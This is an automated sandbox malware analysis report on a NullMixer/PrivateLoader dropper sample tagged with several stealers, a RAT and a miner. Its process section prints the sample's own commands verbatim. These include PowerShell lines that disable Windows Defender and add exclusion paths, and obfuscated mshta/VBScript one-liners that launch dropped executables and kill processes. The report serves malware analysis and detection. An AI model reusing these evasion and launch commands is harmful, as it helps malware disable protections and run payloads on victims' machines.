Malware Analysis Report

2024-11-15 09:03

Sample ID 241110-vy135avkbq
Target 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f
SHA256 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline media23 aspackv2 discovery dropper execution infostealer loader spyware stealer sectoprat chris fucker2 media20 rat trojan raccoon socelars media18 vidar xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f

Threat Level: Known bad

The file 31e01879dfaafe473840c755dedc6390305167a580e24c64d80315731ac6bc4f was found to be: Known bad.

Malicious Activity Summary

fabookie gcleaner nullmixer onlylogger privateloader redline media23 aspackv2 discovery dropper execution infostealer loader spyware stealer sectoprat chris fucker2 media20 rat trojan raccoon socelars media18 vidar xmrig miner

Redline family

Privateloader family

Onlylogger family

Fabookie family

SectopRAT

Socelars family

xmrig

Vidar

Xmrig family

Raccoon family

Socelars payload

Vidar family

Detect Fabookie payload

SectopRAT payload

Raccoon Stealer V1 payload

Fabookie

NullMixer

RedLine

Sectoprat family

Nullmixer family

OnlyLogger

Gcleaner family

RedLine payload

Socelars

PrivateLoader

Raccoon

GCleaner

OnlyLogger payload

Vidar Stealer

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

ASPack v2.12-2.42

Drops Chrome extension

Looks up geolocation information via web service

Looks up external IP address via web service

Blocklisted process makes network request

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

NSIS installer

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Kills process with taskkill

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of UnmapMainImage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 17:25

Signatures

Privateloader family

privateloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

5s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2264 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
PID 2264 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
PID 2264 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
PID 2684 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 3752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 3752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
PID 1536 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
PID 1536 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
PID 3828 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
PID 3828 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
PID 3828 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
PID 3288 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
PID 3288 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
PID 3288 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
PID 3608 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
PID 3608 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
PID 2348 wrote to memory of 4244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2348 wrote to memory of 4244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4692 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
PID 4692 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
PID 4692 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
PID 1152 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
PID 1152 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
PID 1152 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
PID 2872 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
PID 2872 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
PID 2872 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2684 -ip 2684

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 3076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 852

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 860

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

